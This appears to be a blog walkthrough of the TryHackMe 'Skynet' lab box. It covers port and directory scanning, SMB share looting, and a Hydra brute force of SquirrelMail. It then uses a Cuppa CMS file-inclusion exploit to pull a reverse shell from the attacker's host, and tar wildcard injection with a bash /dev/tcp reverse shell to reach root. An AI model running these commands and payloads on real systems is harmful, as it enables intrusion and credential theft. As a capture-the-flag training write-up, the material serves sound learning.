Categories: walkthrough
Tags: tryhackme, PrivEsc, PrivEsc-Linux, Linux-Machine, wildcard, wildcard-injection, tar
$ nmap -p1-65535 10.10.200.150 -T5
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 19:07 IST
Initiating Ping Scan at 19:07
Scanning 10.10.200.150 [2 ports]
Completed Ping Scan at 19:07, 0.36s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:07
Completed Parallel DNS resolution of 1 host. at 19:07, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 19:07
Scanning 10.10.200.150 [6 ports]
Discovered open port 445/tcp on 10.10.200.150
Discovered open port 22/tcp on 10.10.200.150
Discovered open port 80/tcp on 10.10.200.150
Discovered open port 143/tcp on 10.10.200.150
Discovered open port 139/tcp on 10.10.200.150
Discovered open port 110/tcp on 10.10.200.150
Completed Connect Scan at 19:07, 0.37s elapsed (6 total ports)
Nmap scan report for 10.10.200.150
Host is up, received syn-ack (0.37s latency).
Scanned at 2021-07-03 19:07:27 IST for 1s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
110/tcp open pop3 syn-ack
139/tcp open netbios-ssn syn-ack
143/tcp open imap syn-ack
445/tcp open microsoft-ds syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.79 seconds
$ nmap -sV -sC -p22,80,110,139,143,445 10.10.200.150
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 19:09 IST
Nmap scan report for 10.10.200.150
Host is up (0.37s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: TOP CAPA SASL PIPELINING RESP-CODES UIDL AUTH-RESP-CODE
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: ID SASL-IR capabilities IMAP4rev1 OK LITERAL+ post-login have ENABLE LOGINDISABLEDA0001 listed LOGIN-REFERRALS more Pre-login IDLE
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2021-07-03T08:39:37-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-03T13:39:37
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.92 seconds
Username Enumeration - CVE-2016-6210
Local Privilege Escalation - CVE-2019-0211
Home page didn’t have anything useful and there are no input forms. The Search bar is not processing anything on backend
Let’s fuzz for directories
$ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://10.10.200.150/FUZZ -e .php,.html,.txt,.phtml,.php5,.php3 -ic -t 150
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.200.150/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .php .html .txt .phtml .php5 .php3
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 150
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
.html [Status: 403, Size: 278, Words: 20, Lines: 10]
[Status: 200, Size: 523, Words: 26, Lines: 19]
.php [Status: 403, Size: 278, Words: 20, Lines: 10]
.phtml [Status: 403, Size: 278, Words: 20, Lines: 10]
.php3 [Status: 403, Size: 278, Words: 20, Lines: 10]
.php5 [Status: 403, Size: 278, Words: 20, Lines: 10]
index.html [Status: 200, Size: 523, Words: 26, Lines: 19]
admin [Status: 301, Size: 314, Words: 20, Lines: 10]
css [Status: 301, Size: 312, Words: 20, Lines: 10]
js [Status: 301, Size: 311, Words: 20, Lines: 10]
config [Status: 301, Size: 315, Words: 20, Lines: 10]
ai [Status: 301, Size: 311, Words: 20, Lines: 10]
squirrelmail [Status: 301, Size: 321, Words: 20, Lines: 10]
server-status [Status: 403, Size: 278, Words: 20, Lines: 10]
:: Progress: [1543829/1543829] :: Job [1/1] :: 364 req/sec :: Duration: [1:07:47] :: Errors: 46 ::
When we navigate to directories discovered by ffuf most of them shows permissions denied error
squirrelmail
directory greets us with login page
No Juicy Information on pop3 and imap
$ nc -nv 10.10.200.150 110
(UNKNOWN) [10.10.200.150] 110 (pop3) open
+OK Dovecot ready.
LIST
-ERR Unknown command.
CAPA
+OK
CAPA
TOP
UIDL
RESP-CODES
PIPELINING
AUTH-RESP-CODE
SASL
.
USER root
-ERR [AUTH] Plaintext authentication disallowed on non-secure (SSL/TLS) connections.
$ nc -nv 10.10.200.150 143
(UNKNOWN) [10.10.200.150] 143 (imap2) open
* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LOGINDISABLED] Dovecot ready.
Samba has enabled smb version1
$ nmap -p139 --script smb-protocols 10.10.200.150
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 20:09 IST
Nmap scan report for 10.10.200.150
Host is up (0.38s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
Host script results:
| smb-protocols:
| dialects:
| NT LM 0.12 (SMBv1) [dangerous, but default]
| 2.02
| 2.10
| 3.00
| 3.02
|_ 3.11
Nmap done: 1 IP address (1 host up) scanned in 8.16 seconds
Let check the shares in samba
$ smbmap -H 10.10.200.150
[+] Guest session IP: 10.10.200.150:445 Name: 10.10.200.150
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
anonymous READ ONLY Skynet Anonymous Share
milesdyson NO ACCESS Miles Dyson Personal Share
IPC$ NO ACCESS IPC Service (skynet server (Samba, Ubuntu))
we have two shares anonymous
and milesdyson
.
Let’s try to connect on both of them and obtain any information
$ smbclient \\\\10.10.200.150\\anonymous -U anonymous
Enter WORKGROUP\anonymous's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Nov 26 21:34:00 2020
.. D 0 Tue Sep 17 12:50:17 2019
attention.txt N 163 Wed Sep 18 08:34:59 2019
logs D 0 Wed Sep 18 10:12:16 2019
9204224 blocks of size 1024. 5526764 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> cd logs
smb: \logs\> dir
. D 0 Wed Sep 18 10:12:16 2019
.. D 0 Thu Nov 26 21:34:00 2020
log2.txt N 0 Wed Sep 18 10:12:13 2019
log1.txt N 471 Wed Sep 18 10:11:59 2019
log3.txt N 0 Wed Sep 18 10:12:16 2019
get log
9204224 blocks of size 1024. 5526828 blocks available
smb: \logs\> get log1.txt
getting file \logs\log1.txt of size 471 as log1.txt (0.3 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \logs\> get log2.txt
getting file \logs\log2.txt of size 0 as log2.txt (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \logs\> get log3.txt
getting file \logs\log3.txt of size 0 as log3.txt (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \logs\> exit
$ smbclient \\\\10.10.200.150\\milesdyson -U milesdyson
Enter WORKGROUP\milesdyson's password:
session setup failed: NT_STATUS_LOGON_FAILURE
Let check the files, we got from anonymous
share
$ cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
$ cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
[...snip...]
$ cat log2.txt
$ cat log3.txt
By using the details provided in anonymous share
lets try to bruteforce squirrelmail login page using milesdyson
as username and values in log1.txt
as passwords.
Using burp for obtaining the password.
Using Hydra
$ hydra -l milesdyson -P /home/user/log1.txt 10.10.200.150 http-form-post '/squirrelmail/src/redirect.php:login_username=milesdyson&secretkey=^PASS^&js_autodect_results=1&just_logged_in=1:Unknown user or password incorrect.' -I
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-03 21:22:43
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 31 login tries (l:1/p:31), ~2 tries per task
[DATA] attacking http-post-form://10.10.200.150:80/squirrelmail/src/redirect.php:login_username=milesdyson&secretkey=^PASS^&js_autodect_results=1&just_logged_in=1:Unknown user or password incorrect.
[80][http-post-form] host: 10.10.200.150 login: milesdyson password: cyborg007haloterminator
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-03 21:22:55
Username: milesdyson Password: cyborg007haloterminator
when we try to login using the credentials on login page.
we will be greeted with inbox of milesdyson
One of the mail has password for samba share
Password: )s{A&2Z=F^n_E.B`
Let’s use the password for login to samba share
$ smbclient \\\\10.10.200.150\\milesdyson -U milesdyson
Enter WORKGROUP\milesdyson's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Sep 17 14:35:47 2019
.. D 0 Wed Sep 18 09:21:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 14:35:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 14:35:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 14:35:14 2019
notes D 0 Tue Sep 17 14:48:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 14:35:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 14:35:14 2019
9204224 blocks of size 1024. 5526612 blocks available
smb: \> cd notes
smb: \notes\> dir
. D 0 Tue Sep 17 14:48:40 2019
.. D 0 Tue Sep 17 14:35:47 2019
3.01 Search.md N 65601 Tue Sep 17 14:31:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 14:31:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 14:31:29 2019
0.00 Cover.md N 3114 Tue Sep 17 14:31:29 2019
1.02 Linear Algebra.md N 70314 Tue Sep 17 14:31:29 2019
important.txt N 117 Tue Sep 17 14:48:39 2019
6.01 pandas.md N 9221 Tue Sep 17 14:31:29 2019
3.00 Artificial Intelligence.md N 33 Tue Sep 17 14:31:29 2019
2.01 Overview.md N 1165 Tue Sep 17 14:31:29 2019
[...snip...]
1.00 Foundations.md N 22 Tue Sep 17 14:31:29 2019
9204224 blocks of size 1024. 5526612 blocks available
smb: \notes\> get important.txt
getting file \notes\important.txt of size 117 as important.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \notes\>
From all the files in share important.txt
stands out. Lets check it
$ cat important.txt
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
There is /45kra24zxs28v3yd
directory for adding features.
When we navigate to the page. There is nothing much
let’s fuzz for directories
$ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://10.10.200.150/45kra24zxs28v3yd/FUZZ -ic -e .php,.txt,.php3,.php5,.phtml,.txt -t 200
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.200.150/45kra24zxs28v3yd/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
:: Extensions : .php .txt .php3 .php5 .phtml .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 200
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
administrator [Status: 301, Size: 339, Words: 20, Lines: 10]
we got the directory administrator
by fuzzing.
On navigating to the directory. we are greeted with cuppa cms login. Previously obtained credentials,didn’t helped on getting the access.
By searching for public exploits on cuppa, there is remote file inclusion vulnerability in it
$ searchsploit cuppa
----------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | php/webapps/25971.txt
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
$ cat /usr/share/exploitdb/exploits/php/webapps/25971.txt
####################################
VULNERABILITY: PHP CODE INJECTION
####################################
/alerts/alertConfigField.php (LINE: 22)
-----------------------------------------------------------------------------
LINE 22:
<?php include($_REQUEST["urlConfig"]); ?>
-----------------------------------------------------------------------------
#####################################################
DESCRIPTION
#####################################################
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.
http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
#####################################################
EXPLOIT
#####################################################
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
Moreover, We could access Configuration.php source code via PHPStream
For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
-----------------------------------------------------------------------------
Using the File inclusion technique to gain initial access
$ curl http://10.10.200.150/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php\?urlConfig\=http://<ip>:8991/php-reverse-shell.php
Getting user flag
Spawning a tty
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@skynet:/$ ^Z
[1] + 7087 suspended nc -nlvp 8989
$ stty raw -echo; fg
[1] + 7087 continued nc -nlvp 8989
www-data@skynet:/$ pwd
/
Lets check for PrivEsc Techniques
After checking with various techniques, in the crontab there is script running with root privileges by every minute.
Using tar and wilcard injection to escalate our Privileges
www-data@skynet:/$
www-data@skynet:/$ cd /var/www/html
www-data@skynet:/var/www/html$printf '#!/bin/bash\nbash -i >& /dev/tcp/<ip>/8585 0>&1\n' > rev.sh
www-data@skynet:/$ touch /var/www/html/--checkpoint-action=exec=bash\ rev.sh
www-data@skynet:/$ touch /var/www/html/--checkpoint=1
Getting root flag